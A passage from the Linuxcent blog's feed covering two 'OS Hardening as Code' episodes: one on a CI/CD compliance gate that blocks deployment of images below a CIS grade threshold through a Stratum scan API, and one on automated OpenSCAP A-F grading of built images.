        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Show a transient "Copied!" confirmation on the button, then restore the idle label after 2s.
  function ok(btn){
    btn.textContent='Copied!';
    btn.classList.add('copied');
    setTimeout(function(){
      btn.textContent='Copy';
      btn.classList.remove('copied');
    },2000);
  }
  // Fallback copy path for when the async Clipboard API is unavailable or rejects:
  // select the text in an off-screen textarea and run the legacy copy command.
  // text: string to copy; btn: the Copy button whose label reports the outcome.
  function fb(text,btn){
    var ta=null,copied=false;
    try{
      ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);ta.select();
      // execCommand returns false when the copy is unsupported or disabled, so do not assume success.
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    // Always remove the helper textarea, even if select/execCommand threw.
    finally{if(ta&&ta.parentNode)ta.parentNode.removeChild(ta);}
    if(copied){ok(btn);return;}
    btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>OS Hardening as Code, Episode 5</em><br />
<em><a href="https://linuxcent.com/cloud-ami-security-risks-custom-os-images/">Cloud AMI Security Risks</a> · <a href="/linux-hardening-as-code-yaml-blueprint/">Linux Hardening as Code</a> · <a href="/linux-hardening-multi-cloud/">Multi-Cloud OS Hardening</a> · <a href="/automated-openscap-compliance-cis/">Automated OpenSCAP Compliance</a> · <strong>CI/CD Compliance Gate</strong></em></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>A CI/CD compliance gate turns an OS hardening grade from a report into a build constraint — unhardened images fail the pipeline before they can be deployed</li>
<li><code class="" data-line="">POST /api/pipeline/scan</code> returns pass/fail against a minimum grade threshold — integrates into any CI/CD system that can make an HTTP request</li>
<li>Failed gate output tells engineers exactly which controls failed and what to fix — not just &#8220;blocked&#8221;</li>
<li>The gate works on both build-time grades (new images) and runtime grades (existing instances)</li>
<li>GitHub Actions, GitLab CI, Jenkins, and Tekton integrations are one curl command</li>
<li>The structural guarantee: an image that doesn&#8217;t pass the gate doesn&#8217;t exist in the deployment pipeline</li>
</ul>
<hr />
<h2 id="the-problem-a-grade-no-one-checks-is-decoration">The Problem: A Grade No One Checks Is Decoration</h2>
<pre><code class="" data-line="">Pipeline without compliance gate:
  Build → Test → Security scan (results to dashboard) → Deploy

What actually happens:
  Build → Test → Security scan → &quot;C grade, but we need to ship&quot; → Deploy anyway
                                           │
                                           └─ Dashboard shows C grade
                                              Nobody is paged
                                              Deployment succeeds
</code></pre>
<p>A CI/CD compliance gate means the pipeline can&#8217;t continue if the grade is below threshold.</p>
<p>EP04 showed that automated OpenSCAP compliance gives every image a verified, reproducible grade before deployment. What it assumed is that someone checks the grade before deploying. They don&#8217;t — not under deadline pressure, not when the image has been &#8220;working fine for months,&#8221; not at 2am.</p>
<p>The same problem that made hardening runbooks skippable applies to compliance grades: if checking the grade is a discretionary step, it will be skipped.</p>
<hr />
<p>A new microservice was deployed from an unhardened base image. The team had built it quickly during a sprint, used a community AMI as the base, and planned to harden it &#8220;in the next sprint.&#8221;</p>
<p>Three weeks later, a penetration test found it. SSH password authentication enabled. Three unnecessary services running — one of them with a known CVE. The finding: the instance had full inbound access from the VPC and was reachable from a compromised adjacent instance.</p>
<p>The deployment had gone through the normal CI/CD pipeline. Unit tests passed. Integration tests passed. A vulnerability scan ran. The scan produced a report that went to a dashboard. Nobody had a gate set up to fail the build if the image was unhardened.</p>
<p>The hardening work from the &#8220;next sprint&#8221; plan would have taken four hours. The pentest remediation took a week, plus the time to investigate what had been exposed during the three weeks the instance was running.</p>
<p>The CI/CD pipeline had every check except the one that would have caught the base image problem before the first deployment.</p>
<hr />
<h2 id="the-pipeline-api">The Pipeline API</h2>
<p>The Pipeline API is a single HTTP endpoint that takes an image or instance ID, checks it against a minimum grade, and returns pass or fail:</p>
<pre><code class="" data-line=""># Fail the pipeline if the image grade is below B
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H &quot;Authorization: Bearer ${STRATUM_TOKEN}&quot; \
  -H &quot;Content-Type: application/json&quot; \
  -d &#039;{
    &quot;image_id&quot;: &quot;ami-0a7f3c9e82d1b4c05&quot;,
    &quot;min_grade&quot;: &quot;B&quot;
  }&#039;

# Pass response (grade A):
# HTTP 200
# {
#   &quot;result&quot;: &quot;pass&quot;,
#   &quot;image_id&quot;: &quot;ami-0a7f3c9e82d1b4c05&quot;,
#   &quot;grade&quot;: &quot;A&quot;,
#   &quot;score&quot;: 94,
#   &quot;controls_passing&quot;: 94,
#   &quot;controls_total&quot;: 100,
#   &quot;scanned_at&quot;: &quot;2026-04-19T15:54:10Z&quot;
# }

# Fail response (grade C):
# HTTP 422
# {
#   &quot;result&quot;: &quot;fail&quot;,
#   &quot;image_id&quot;: &quot;ami-0c9d5e3f81a2b6e07&quot;,
#   &quot;grade&quot;: &quot;C&quot;,
#   &quot;score&quot;: 72,
#   &quot;min_grade_required&quot;: &quot;B&quot;,
#   &quot;failing_controls&quot;: [
#     { &quot;id&quot;: &quot;1.1.7&quot;, &quot;title&quot;: &quot;Separate partition for /var/log/audit&quot;, &quot;severity&quot;: &quot;medium&quot; },
#     { &quot;id&quot;: &quot;3.3.2&quot;, &quot;title&quot;: &quot;TCP SYN cookies enabled&quot;, &quot;severity&quot;: &quot;low&quot; },
#     ...
#   ]
# }
</code></pre>
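<p>An HTTP error response fails the pipeline. curl&#8217;s <code class="" data-line="">-f</code> flag handles this — if the API returns 422, curl exits non-zero, so the pipeline step exits non-zero and the job fails. The <code class="" data-line="">|| { …; exit 1; }</code> in the GitHub Actions example only adds a readable message on top of that. Note that <code class="" data-line="">-f</code> also discards the response body; on curl 7.76 or newer, use <code class="" data-line="">--fail-with-body</code> instead if you want the failing-controls JSON printed in the CI log.</p>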
<hr />
<h2 id="github-actions-integration">GitHub Actions Integration</h2>
<pre><code class="" data-line=""># .github/workflows/deploy.yml

jobs:
  build-image:
    runs-on: ubuntu-latest
    outputs:
      ami_id: ${{ steps.build.outputs.ami_id }}
    steps:
      - name: Build hardened AMI
        id: build
        run: |
          AMI_ID=$(stratum build \
            --blueprint ubuntu22-cis-l1.yaml \
            --provider aws \
            --output json | jq -r &#039;.image_id&#039;)
          echo &quot;ami_id=${AMI_ID}&quot; &gt;&gt; $GITHUB_OUTPUT

  compliance-gate:
    runs-on: ubuntu-latest
    needs: build-image
    steps:
      - name: Stratum compliance gate
        run: |
          curl -sf -X POST ${{ vars.STRATUM_URL }}/api/pipeline/scan \
            -H &quot;Authorization: Bearer ${{ secrets.STRATUM_TOKEN }}&quot; \
            -H &quot;Content-Type: application/json&quot; \
            -d &quot;{\&quot;image_id\&quot;: \&quot;${{ needs.build-image.outputs.ami_id }}\&quot;, \&quot;min_grade\&quot;: \&quot;B\&quot;}&quot; \
            || { echo &quot;Compliance gate failed — image does not meet minimum grade B&quot;; exit 1; }

  deploy:
    runs-on: ubuntu-latest
    needs: [build-image, compliance-gate]
    steps:
      - name: Deploy to staging
        run: |
          aws autoscaling update-auto-scaling-group \
            --auto-scaling-group-name my-asg \
            --launch-template &quot;ImageId=${{ needs.build-image.outputs.ami_id }}&quot;
</code></pre>
<p>The <code class="" data-line="">deploy</code> job only runs if <code class="" data-line="">compliance-gate</code> passes. The AMI doesn&#8217;t reach the autoscaling group if it doesn&#8217;t meet the grade threshold.</p>
<hr />
<h2 id="gitlab-ci-integration">GitLab CI Integration</h2>
<pre><code class="" data-line=""># .gitlab-ci.yml

stages:
  - build
  - compliance
  - deploy

build-image:
  stage: build
  script:
    - |
      AMI_ID=$(stratum build \
        --blueprint ubuntu22-cis-l1.yaml \
        --provider aws \
        --output json | jq -r &#039;.image_id&#039;)
      echo &quot;AMI_ID=${AMI_ID}&quot; &gt;&gt; build.env
  artifacts:
    reports:
      dotenv: build.env

compliance-gate:
  stage: compliance
  needs: [build-image]
  script:
    - |
      curl -sf -X POST ${STRATUM_URL}/api/pipeline/scan \
        -H &quot;Authorization: Bearer ${STRATUM_TOKEN}&quot; \
        -H &quot;Content-Type: application/json&quot; \
        -d &quot;{\&quot;image_id\&quot;: \&quot;${AMI_ID}\&quot;, \&quot;min_grade\&quot;: \&quot;B\&quot;}&quot;

deploy:
  stage: deploy
  needs: [build-image, compliance-gate]
  script:
    - ./deploy.sh ${AMI_ID}
</code></pre>
<hr />
<h2 id="what-the-failed-gate-tells-you">What the Failed Gate Tells You</h2>
<p>The value of the CI/CD compliance gate is not just that it blocks bad images — it&#8217;s that the failure output tells engineers what to fix.</p>
<p>A gate failure in CI shows:</p>
<pre><code class="" data-line="">Compliance gate failed.

Image: ami-0c9d5e3f81a2b6e07
Grade: C (72/100)
Required: B (85/100)
Gap: 13 more controls must pass (28 failing)

Failing controls:
  HIGH   1.1.7   Separate partition for /var/log/audit
                 Fix: Provision /var/log/audit on a separate EBS volume
  MEDIUM 1.6.1.3 AppArmor enabled in bootloader
                 Fix: Update GRUB_CMDLINE_LINUX, run update-grub, reboot
  MEDIUM 3.3.2   TCP SYN cookies
                 Fix: echo &quot;net.ipv4.tcp_syncookies=1&quot; &gt; /etc/sysctl.d/60-cis.conf
  LOW    5.2.21  SSH MaxStartups
                 Fix: Add &quot;MaxStartups 10:30:60&quot; to /etc/ssh/sshd_config
  ...

View full scan report: https://stratum.yourdomain.com/scans/ami-0c9d5e3f81a2b6e07
</code></pre>
<p>This is not a wall — it&#8217;s a list of exactly what to fix. The engineer running the pipeline sees the gap, fixes the blueprint or the Ansible role, rebuilds, and the gate passes. The gap is closed before any instance is deployed.</p>
<hr />
<h2 id="runtime-gate-checking-existing-instances">Runtime Gate: Checking Existing Instances</h2>
<p>The Pipeline API also works against running instances, not just images:</p>
<pre><code class="" data-line=""># Gate on a running instance&#039;s current compliance state
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H &quot;Authorization: Bearer ${STRATUM_TOKEN}&quot; \
  -H &quot;Content-Type: application/json&quot; \
  -d &#039;{
    &quot;instance_id&quot;: &quot;i-0abc123&quot;,
    &quot;min_grade&quot;: &quot;B&quot;,
    &quot;scan_type&quot;: &quot;runtime&quot;
  }&#039;
</code></pre>
<p>This is useful in deployment pipelines that don&#8217;t build custom AMIs — they launch instances and configure them after launch. The runtime gate runs after configuration is complete and before the instance is registered with the load balancer.</p>
<p>It also integrates into scheduled compliance jobs — scan your fleet on a schedule and alert when any instance drifts below grade threshold.</p>
<hr />
<h2 id="grade-thresholds-by-environment">Grade Thresholds by Environment</h2>
<p>Not all environments need the same threshold. A common pattern:</p>
<pre><code class="" data-line=""># Environment-specific minimum grades
environments:
  production: A      # 95%+ passing — no exceptions
  staging:    B      # 85%+ passing — minor gaps acceptable
  development: C     # 70%+ passing — experimental OK
</code></pre>
<pre><code class="" data-line=""># Production deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d &#039;{&quot;image_id&quot;: &quot;ami-...&quot;, &quot;min_grade&quot;: &quot;A&quot;}&#039;

# Staging deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d &#039;{&quot;image_id&quot;: &quot;ami-...&quot;, &quot;min_grade&quot;: &quot;B&quot;}&#039;
</code></pre>
<p>This lets development move fast with a lower bar while enforcing the highest standard at the production gate.</p>
<hr />
<h2 id="production-gotchas">Production Gotchas</h2>
<p><strong>Gate latency on first scan:</strong> If the image hasn&#8217;t been scanned yet, the Pipeline API triggers a scan on demand. This takes 2–3 minutes. For build pipelines that want instant gate results, use <code class="" data-line="">stratum build --blueprint ... --scan-on-build</code> to ensure the scan runs during the build step and the result is cached for the gate call.</p>
<p><strong>Token rotation:</strong> The <code class="" data-line="">STRATUM_TOKEN</code> used for API authentication should be rotated on the same schedule as other service credentials. Use environment-specific tokens so a compromised staging token doesn&#8217;t bypass a production gate.</p>
<p><strong>Webhook notifications on gate failure:</strong> The Pipeline API can send a webhook to Slack, PagerDuty, or any endpoint when a gate fails. Configure this for production pipelines so failures are visible beyond the CI log.</p>
<pre><code class="" data-line=""># In the Stratum config
notifications:
  pipeline_failures:
    - type: slack
      webhook: ${SLACK_WEBHOOK}
      channel: &quot;#platform-security&quot;
    - type: webhook
      url: ${PAGERDUTY_WEBHOOK}
      min_grade: D     # only page on D/F, not B/C failures
</code></pre>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>A CI/CD compliance gate turns a compliance grade from a dashboard metric into a pipeline constraint — the image doesn&#8217;t deploy if it doesn&#8217;t pass</li>
<li><code class="" data-line="">POST /api/pipeline/scan</code> is a single HTTP call that any CI/CD system can make — no agent, no plugin, no SDK required</li>
<li>Failed gate output is actionable: every failing control includes the specific fix, not just the control ID</li>
<li>Runtime gates check instances after configuration, not just at image build time</li>
<li>Environment-specific thresholds let development move faster while enforcing the highest standard at production</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>The CI/CD compliance gate closes the final gap: even if an unhardened image gets built, it can&#8217;t deploy. EP05 is the bookmark episode — this is the point where OS hardening becomes structurally enforced rather than procedurally expected.</p>
<p>EP06 is the series closer. For five episodes, you&#8217;ve been using Stratum as a user. What does it look like to run it yourself — extend it with a custom control, add a provider, deploy the platform in your own infrastructure?</p>
<p>Stratum is open-core (Apache 2.0). EP06 is the architecture reveal, the GitHub release, and the extension guide for everything the series taught.</p>
<p><em>Next: <a href="https://linuxcent.com/stratum-os-hardening-platform-open-source/">Stratum — open-source OS hardening platform for multi-cloud infrastructure</a></em></p>
<p>Get EP06 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&#038;title=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" data-a2a-url="https://linuxcent.com/hardened-image-cicd-pipeline-gate/" data-a2a-title="The Pipeline Gate — Hardened Images as a CI/CD Build Constraint"></a></p><p>The post <a href="https://linuxcent.com/hardened-image-cicd-pipeline-gate/">The Pipeline Gate — Hardened Images as a CI/CD Build Constraint</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/hardened-image-cicd-pipeline-gate/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1831</post-id>	</item>
		<item>
		<title>Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment</title>
		<link>https://linuxcent.com/automated-compliance-scanning-openscap/</link>
					<comments>https://linuxcent.com/automated-compliance-scanning-openscap/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Fri, 15 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[OS Image Builder]]></category>
		<category><![CDATA[CIS]]></category>
		<category><![CDATA[Compliance]]></category>
		<category><![CDATA[DevSecOps]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[OpenSCAP]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stratum]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1828</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span>Automated OpenSCAP scanning with A-F compliance grades before deployment. SARIF export, drift detection, and compliance metadata baked into every AMI.</p>
<p>The post <a href="https://linuxcent.com/automated-compliance-scanning-openscap/">Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel; position:relative anchors the absolutely positioned badge and copy button. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code nested in a pre inherits the panel colours instead. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border accent keyed on the data-lang attribute set by the enhancer script. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned top-right and transparent until the block is hovered or the button is focused. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
/* Keyboard users never trigger pre:hover; reveal the button when it receives focus. */
.lc-copy-btn:focus{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: pinned top-left, shown only while the block is hovered; never intercepts clicks. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables: full width, collapsed borders, zebra striping on even rows. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
/* Code-block enhancer: adds a Copy button to every pre element and, when its code child has a language-* class, a data-lang attribute and a language badge. */
(function(){
  /* Run at most once per page, even if this script is included several times. */
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  /* Text to copy: the code child's text when there is one; otherwise the pre's own text with the injected button/badge removed so their labels are not copied. */
  function textOf(pre,code){
    if(code)return code.innerText;
    var clone=pre.cloneNode(true);
    clone.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(el){el.parentNode.removeChild(el);});
    return clone.textContent;
  }
  /* Decorate every pre element currently in the document. */
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      /* Explicit type: a button without one acts as a submit button when it sits inside a form. */
      btn.type='button';
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=textOf(pre,code);
        /* Prefer the async Clipboard API in secure contexts; otherwise, or if it rejects, use the textarea fallback. */
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  /* Success feedback: show "Copied!" for two seconds, then restore the label. */
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  /* Fallback copy through an off-screen textarea and execCommand('copy'). */
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    try{
      ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);ta.select();
      /* execCommand reports refusal by returning false, not by throwing. */
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    /* Always remove the helper textarea, including when select/execCommand threw. */
    finally{if(ta.parentNode)ta.parentNode.removeChild(ta);}
    if(copied){ok(btn);}
    else{btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  /* Enhance now if the DOM is already parsed; otherwise wait for DOMContentLoaded. */
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>OS Hardening as Code, Episode 4</em><br />
<em><a href="https://linuxcent.com/cloud-ami-security-risks-custom-os-images/">Cloud AMI Security Risks</a> · <a href="https://linuxcent.com/linux-hardening-as-code-yaml-blueprint/">Linux Hardening as Code</a> · <a href="https://linuxcent.com/linux-hardening-multi-cloud/">Multi-Cloud OS Hardening</a> · </em><em><strong>Automated OpenSCAP Compliance</strong></em></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>&#8220;We use CIS L1&#8221; means nothing without a verified grade — automated OpenSCAP compliance provides one before any instance is deployed</li>
<li>Stratum runs OpenSCAP after every build and attaches the grade to the image metadata: <code class="" data-line="">cis-l1-A-98</code></li>
<li>Grades are A through F based on percentage of controls passing, with explicit accounting for documented overrides</li>
<li>SARIF output is machine-readable — importable directly into GitHub Advanced Security, Jira, or any SIEM</li>
<li>Drift detection: rescan any running instance against the original blueprint and see exactly which controls changed since the image was built</li>
<li>An image that scores below your minimum grade threshold doesn&#8217;t get snapshotted — it doesn&#8217;t exist</li>
</ul>
<hr />
<h2 id="the-problem-a-grade-thats-never-been-verified-is-not-a-grade">The Problem: A Grade That&#8217;s Never Been Verified Is Not a Grade</h2>
<pre><code class="" data-line="">Security audit request:
&quot;Provide CIS L1 compliance evidence for all production instances&quot;

Team response:
  Instance A: &quot;CIS L1 hardened&quot; — OpenSCAP last run: 4 months ago
  Instance B: &quot;CIS L1 hardened&quot; — OpenSCAP last run: never
  Instance C: &quot;CIS L1 hardened&quot; — OpenSCAP version: 1.2 (current: 1.3.8)
  Instance D: &quot;CIS L1 hardened&quot; — manual scan output: &quot;87% passing&quot;
  Instance E: &quot;CIS L1 hardened&quot; — manual scan output: &quot;91% passing&quot;

&quot;Which profile was used for D and E? Are they comparable?&quot;
&quot;Were they scanned before or after a recent kernel update?&quot;
&quot;Why is C running an old OpenSCAP version?&quot;
</code></pre>
<p>Automated OpenSCAP compliance means the grade is generated the same way, on every image, every time, before the image is ever deployed.</p>
<p>EP03 showed that the same HardeningBlueprint YAML builds consistent OS images across six cloud providers. What it left open is the question every auditor eventually asks: how do you know the Ansible hardening actually did what you think it did? Running Ansible-Lockdown successfully means the tasks ran. It does not mean every CIS control is satisfied — some controls can&#8217;t be applied by Ansible alone, some require manual verification, and some interact with the environment in unexpected ways.</p>
<hr />
<p>A compliance team requested CIS L2 evidence for a SOC 2 Type II audit. The security team had been running OpenSCAP scans — but manually, on-demand, using slightly different profiles across teams, with no standard for how to store or compare results.</p>
<p>The audit found four problems:<br />
1. Two instances had been scanned with CIS L1, not L2, despite being labeled &#8220;CIS L2&#8221;<br />
2. Three instances hadn&#8217;t been scanned in over six months<br />
3. The scan outputs from different teams were in different formats (HTML vs XML vs text)<br />
4. Two instances showed &#8220;91% passing&#8221; and &#8220;89% passing&#8221; — with no documentation of whether those were acceptable thresholds or what the failing controls were</p>
<p>The audit took two weeks to resolve. The finding wasn&#8217;t a security failure — it was a documentation and process failure. But it consumed two weeks of engineering time and appeared in the audit report as a gap.</p>
<p>The root cause: compliance scanning was a manual step that produced inconsistent output in an inconsistent format.</p>
<hr />
<h2 id="how-automated-openscap-compliance-works">How Automated OpenSCAP Compliance Works</h2>
<p>Every Stratum build ends with an automated OpenSCAP scan:</p>
<pre><code class="" data-line="">stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws
      │
      ├─ Provisions build instance
      │
      ├─ Runs Ansible-Lockdown (144 tasks)
      │
      ├─ Runs post-build OpenSCAP scan
      │    ├── Profile: CIS Ubuntu 22.04 L1 (from blueprint)
      │    ├── OpenSCAP version: pinned in blueprint (default: latest)
      │    └── 100 controls checked
      │
      ├─ Calculates grade
      │    ├── Passing:   92 controls
      │    ├── Failing:   6 controls
      │    ├── Overrides: 2 (documented in blueprint)
      │    └── Grade: A (94/100 effective, 98% pass rate)
      │
      ├─ Writes to image metadata:
      │    compliance_grade=cis-l1-A-94
      │    compliance_scan_date=2026-04-19
      │    compliance_blueprint=ubuntu22-cis-l1.yaml@v1.2
      │
      └─ Snapshots AMI (or fails if grade &lt; min_grade)
</code></pre>
<p>The grade is written into the AMI (or GCP/Azure image) metadata at creation time. It travels with the image. Any instance launched from this AMI carries the provenance of what was applied and what grade was achieved.</p>
<hr />
<h2 id="the-a-f-grade-calculation">The A-F Grade Calculation</h2>
<p>The grade is not a simple percentage. It accounts for documented overrides and applies a threshold-based letter scale:</p>
<pre><code class="" data-line="">Total CIS controls:    100
Passing:               92
Failing:               6 (genuine failures)
Overrides (compliant): 2 (documented in blueprint, counted as passing)

Effective passing:     94 / 100
Grade:                 A
</code></pre>
<p>Grade thresholds (configurable per blueprint):</p>
<table>
<thead>
<tr>
<th>Grade</th>
<th>Default threshold</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>A</td>
<td>≥ 95% effective</td>
<td>Production-ready, minimal exceptions</td>
</tr>
<tr>
<td>B</td>
<td>85–94%</td>
<td>Acceptable with documented exceptions</td>
</tr>
<tr>
<td>C</td>
<td>70–84%</td>
<td>Below standard — deploy with caution</td>
</tr>
<tr>
<td>D</td>
<td>55–69%</td>
<td>Significant gaps — do not deploy to production</td>
</tr>
<tr>
<td>F</td>
<td>&lt; 55%</td>
<td>Hardening failed — image not snapshotted</td>
</tr>
</tbody>
</table>
<p>The thresholds are configurable in the blueprint:</p>
<pre><code class="" data-line="">compliance:
  benchmark: cis-l1
  controls: all
  min_grade: B          # Build fails if grade &lt; B
  grade_thresholds:
    A: 95
    B: 85
    C: 70
    D: 55
</code></pre>
<p>If the build produces a grade below <code class="" data-line="">min_grade</code>, the instance is terminated and no image is created. The failure is logged with the full list of controls that blocked the grade.</p>
<hr />
<h2 id="reading-the-scan-output">Reading the Scan Output</h2>
<pre><code class="" data-line=""># Show the last build&#039;s scan results
stratum scan --show-last --blueprint ubuntu22-cis-l1.yaml

# Output:
# Build: ubuntu22-cis-l1 @ 2026-04-19T15:42:01Z
# Provider: aws (ap-south-1)
# Grade: A (94/100 effective controls)
#
# Passing controls: 92
# Failing controls: 6
# ──────────────────────────────────────────────
# FAIL  1.1.7   Ensure separate partition for /var/log/audit
#       Reason: tmpfs used — separate block device not configured
#       Remediation: Add /var/log/audit to separate EBS volume
#
